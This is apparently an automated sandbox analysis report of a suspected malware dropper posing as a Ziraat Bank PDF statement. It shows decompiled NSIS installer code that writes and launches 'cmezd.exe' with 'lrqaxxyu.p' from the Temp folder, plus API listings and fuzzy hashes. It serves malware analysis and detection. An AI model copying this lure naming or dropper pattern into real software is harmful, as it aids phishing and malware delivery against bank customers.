                                                                                              0x00404379
                                                                                              0x0040437f
                                                                                              0x00404385
                                                                                              0x00404389
                                                                                              0x00404390
                                                                                              0x00404390
                                                                                              0x00404390
                                                                                              0x0040439a
                                                                                              0x004043ac
                                                                                              0x004043b8
                                                                                              0x004043bd
                                                                                              0x004043c7
                                                                                              0x004043cd
                                                                                              0x004043cf
                                                                                              0x004043d4
                                                                                              0x004043d1
                                                                                              0x004043d1
                                                                                              0x004043d1
                                                                                              0x004043e4
                                                                                              0x004043fc
                                                                                              0x004043fe
                                                                                              0x00404404
                                                                                              0x00404419
                                                                                              0x00404406
                                                                                              0x0040440f
                                                                                              0x00404411
                                                                                              0x00404411
                                                                                              0x0040441f
                                                                                              0x00404430
                                                                                              0x00404446
                                                                                              0x0040444d
                                                                                              0x00404453
                                                                                              0x00404457
                                                                                              0x0040445c
                                                                                              0x0040445e
                                                                                              0x00000000
                                                                                              0x00404464
                                                                                              0x00404464
                                                                                              0x00404466
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040446c
                                                                                              0x00404470
                                                                                              0x00404495
                                                                                              0x0040449b
                                                                                              0x004044a1
                                                                                              0x004044a3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004044c9
                                                                                              0x004044cf
                                                                                              0x004044d1
                                                                                              0x004044d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004044dc
                                                                                              0x004044df
                                                                                              0x004044e2
                                                                                              0x004044f9
                                                                                              0x00404505
                                                                                              0x0040451e
                                                                                              0x00404524
                                                                                              0x00404528
                                                                                              0x0040452d
                                                                                              0x00404533
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040453d
                                                                                              0x00404548
                                                                                              0x00000000
                                                                                              0x00404548
                                                                                              0x00404472
                                                                                              0x00404478
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040447e
                                                                                              0x00404484
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040448a
                                                                                              0x0040445e
                                                                                              0x00404555
                                                                                              0x00404561
                                                                                              0x00404568
                                                                                              0x00000000
                                                                                              0x004042b3
                                                                                              0x004042b3
                                                                                              0x004042b6
                                                                                              0x004042e9
                                                                                              0x004042e9
                                                                                              0x004042eb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042eb
                                                                                              0x004042b8
                                                                                              0x004042bc
                                                                                              0x004042c1
                                                                                              0x004042c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042d3
                                                                                              0x004042db
                                                                                              0x00000000
                                                                                              0x004042e1
                                                                                              0x004040e9
                                                                                              0x004040e9
                                                                                              0x004040ed
                                                                                              0x004040f2
                                                                                              0x00404101
                                                                                              0x00404101
                                                                                              0x00404107
                                                                                              0x0040410e
                                                                                              0x00404152
                                                                                              0x00404158
                                                                                              0x00404171
                                                                                              0x00404174
                                                                                              0x00404187
                                                                                              0x0040418d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404193
                                                                                              0x0040419e
                                                                                              0x004041a0
                                                                                              0x004041a2
                                                                                              0x004041c1
                                                                                              0x004041c1
                                                                                              0x004041c4
                                                                                              0x004041c9
                                                                                              0x004041cc
                                                                                              0x004041dc
                                                                                              0x004041dd
                                                                                              0x004041df
                                                                                              0x00404215
                                                                                              0x00404225
                                                                                              0x00000000
                                                                                              0x00404225
                                                                                              0x004041e1
                                                                                              0x004041e7
                                                                                              0x00404200
                                                                                              0x00404205
                                                                                              0x00404207
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404209
                                                                                              0x004041f5
                                                                                              0x004041f5
                                                                                              0x004041f7
                                                                                              0x004041f7
                                                                                              0x00000000
                                                                                              0x004041f7
                                                                                              0x004041ea
                                                                                              0x004041ef
                                                                                              0x00000000
                                                                                              0x004041ef
                                                                                              0x004041ce
                                                                                              0x004041d4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004041d6
                                                                                              0x00000000
                                                                                              0x004041d6
                                                                                              0x004041c6
                                                                                              0x00000000
                                                                                              0x004041c6
                                                                                              0x004041ac
                                                                                              0x004041b3
                                                                                              0x004041b9
                                                                                              0x004041bb
                                                                                              0x00404591
                                                                                              0x00000000
                                                                                              0x00404591
                                                                                              0x00000000
                                                                                              0x004041bb
                                                                                              0x00404179
                                                                                              0x00000000
                                                                                              0x00404181
                                                                                              0x00404160
                                                                                              0x00404166
                                                                                              0x0040456e
                                                                                              0x0040456e
                                                                                              0x00404574
                                                                                              0x00404581
                                                                                              0x00404587
                                                                                              0x00404587
                                                                                              0x00000000
                                                                                              0x00404110
                                                                                              0x00404115
                                                                                              0x00404121
                                                                                              0x0040412a
                                                                                              0x0040422b
                                                                                              0x00000000
                                                                                              0x00404149
                                                                                              0x0040414c
                                                                                              0x00000000
                                                                                              0x0040414c
                                                                                              0x0040412a
                                                                                              0x0040410e

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                              • ShowWindow.USER32(?), ref: 00404121
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                              • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                              • DestroyWindow.USER32 ref: 00404160
                                                                                              • SetWindowLongW.USER32 ref: 00404179
                                                                                              • GetDlgItem.USER32 ref: 00404198
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                              • GetDlgItem.USER32 ref: 0040425E
                                                                                              • GetDlgItem.USER32 ref: 00404268
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                              • GetDlgItem.USER32 ref: 00404379
                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                              • EnableWindow.USER32(?,?), ref: 004043AC
                                                                                              • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                              • EnableMenuItem.USER32 ref: 004043E4
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                              • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: H7B
                                                                                              • API String ID: 2475350683-2300413410
                                                                                              • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                              • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                              • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                              • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                                                              C-Code - Quality: 96%
                                                                                              			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                              0x00403d1d
                                                                                              0x00403d26
                                                                                              0x00403d2d
                                                                                              0x00403d2f
                                                                                              0x00403d43
                                                                                              0x00403d55
                                                                                              0x00403d5e
                                                                                              0x00403d67
                                                                                              0x00403d6e
                                                                                              0x00403d73
                                                                                              0x00403d7a
                                                                                              0x00403d8d
                                                                                              0x00403d8d
                                                                                              0x00403d98
                                                                                              0x00403d31
                                                                                              0x00403d3c
                                                                                              0x00403d3c
                                                                                              0x00403d9d
                                                                                              0x00403da7
                                                                                              0x00403db0
                                                                                              0x00403db5
                                                                                              0x00403dc6
                                                                                              0x00403e58
                                                                                              0x00403e60
                                                                                              0x00403e69
                                                                                              0x00403e69
                                                                                              0x00403e7f
                                                                                              0x00403e85
                                                                                              0x00403e93
                                                                                              0x00403f14
                                                                                              0x00403f1c
                                                                                              0x00403f26
                                                                                              0x00403f2b
                                                                                              0x00403f31
                                                                                              0x00403fbb
                                                                                              0x00403fc0
                                                                                              0x00403fc2
                                                                                              0x00403fde
                                                                                              0x00000000
                                                                                              0x00403fde
                                                                                              0x00403fc4
                                                                                              0x00403fca
                                                                                              0x00403fd2
                                                                                              0x00403fd2
                                                                                              0x00000000
                                                                                              0x00403fca
                                                                                              0x00403f3f
                                                                                              0x00403f4a
                                                                                              0x00403f4f
                                                                                              0x00403f51
                                                                                              0x00403f58
                                                                                              0x00403f58
                                                                                              0x00403f63
                                                                                              0x00403f6b
                                                                                              0x00403f6d
                                                                                              0x00403f6f
                                                                                              0x00403f78
                                                                                              0x00403f7b
                                                                                              0x00403f81
                                                                                              0x00403f81
                                                                                              0x00403fa0
                                                                                              0x00403fb1
                                                                                              0x00000000
                                                                                              0x00403fb6
                                                                                              0x00403f1e
                                                                                              0x00403f20
                                                                                              0x00000000
                                                                                              0x00403e95
                                                                                              0x00403e95
                                                                                              0x00403ea1
                                                                                              0x00403eab
                                                                                              0x00403eb1
                                                                                              0x00403eb6
                                                                                              0x00403ec5
                                                                                              0x00403fe3
                                                                                              0x00403fe3
                                                                                              0x00000000
                                                                                              0x00403fe3
                                                                                              0x00403ed4
                                                                                              0x00403f0f
                                                                                              0x00000000
                                                                                              0x00403f0f
                                                                                              0x00403dcc
                                                                                              0x00403dcc
                                                                                              0x00403dcf
                                                                                              0x00403dd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403ddf
                                                                                              0x00403df1
                                                                                              0x00403df6
                                                                                              0x00403dff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e05
                                                                                              0x00403e07
                                                                                              0x00403e14
                                                                                              0x00403e14
                                                                                              0x00403e1d
                                                                                              0x00403e23
                                                                                              0x00403e4b
                                                                                              0x00403e53
                                                                                              0x00000000
                                                                                              0x00403e35
                                                                                              0x00403e36
                                                                                              0x00403e3f
                                                                                              0x00403e45
                                                                                              0x00403e46
                                                                                              0x00000000
                                                                                              0x00403e46
                                                                                              0x00403e41
                                                                                              0x00403e43
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e43
                                                                                              0x00403e23

                                                                                              APIs
                                                                                                • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                              • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,?,?,?,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74D0FAA0), ref: 00403E18
                                                                                              • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,?,?,?,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                              • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,?,00000000,?), ref: 00403E36
                                                                                              • LoadImageW.USER32 ref: 00403E7F
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              • RegisterClassW.USER32 ref: 00403EBC
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                              • CreateWindowExW.USER32 ref: 00403F09
                                                                                              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                              • GetClassInfoW.USER32 ref: 00403F6B
                                                                                              • GetClassInfoW.USER32 ref: 00403F78
                                                                                              • RegisterClassW.USER32 ref: 00403F81
                                                                                              • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 1975747703-3589430903
                                                                                              • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                              • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                              • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                              • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                                                              C-Code - Quality: 98%
                                                                                              			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                                                              0x004030db
                                                                                              0x004030de
                                                                                              0x004030e1
                                                                                              0x004030fb
                                                                                              0x00403100
                                                                                              0x00403113
                                                                                              0x00403118
                                                                                              0x0040311e
                                                                                              0x00000000
                                                                                              0x00403120
                                                                                              0x00403131
                                                                                              0x00403142
                                                                                              0x00403149
                                                                                              0x00403151
                                                                                              0x00403156
                                                                                              0x00403158
                                                                                              0x00403243
                                                                                              0x00403245
                                                                                              0x00403251
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040325a
                                                                                              0x00403286
                                                                                              0x0040328b
                                                                                              0x00403296
                                                                                              0x00403298
                                                                                              0x004032a9
                                                                                              0x004032c4
                                                                                              0x004032cd
                                                                                              0x004032d2
                                                                                              0x004032f1
                                                                                              0x00403301
                                                                                              0x00403313
                                                                                              0x00403318
                                                                                              0x00403320
                                                                                              0x0040332d
                                                                                              0x00403335
                                                                                              0x0040333a
                                                                                              0x0040333c
                                                                                              0x0040333c
                                                                                              0x00403344
                                                                                              0x00403344
                                                                                              0x00403347
                                                                                              0x00403348
                                                                                              0x00403348
                                                                                              0x0040334b
                                                                                              0x0040334d
                                                                                              0x0040334d
                                                                                              0x00403357
                                                                                              0x00403363
                                                                                              0x00000000
                                                                                              0x00403368
